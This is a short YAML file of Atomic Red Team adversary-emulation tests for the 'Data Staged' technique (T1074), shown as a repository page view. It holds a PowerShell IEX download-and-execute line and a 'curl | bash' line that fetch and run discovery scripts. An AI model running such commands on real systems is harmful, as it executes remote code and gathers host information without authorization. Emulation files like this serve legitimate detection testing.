Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
30 lines
860 B
YAML
30 lines
860 B
YAML
---
|
|
attack_technique: T1074
|
|
display_name: Data Staged
|
|
|
|
atomic_tests:
|
|
- name: Stage data from Discovery.bat
|
|
description: |
|
|
Utilize powershell to download discovery.bat and save to a local file
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat') > pi.log
|
|
|
|
- name: Stage data from Discovery.sh
|
|
description: |
|
|
Utilize curl to download discovery.sh and execute a basic information gathering shell script
|
|
|
|
supported_platforms:
|
|
- linux
|
|
- macos
|
|
|
|
executor:
|
|
name: bash
|
|
command: |
|
|
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log |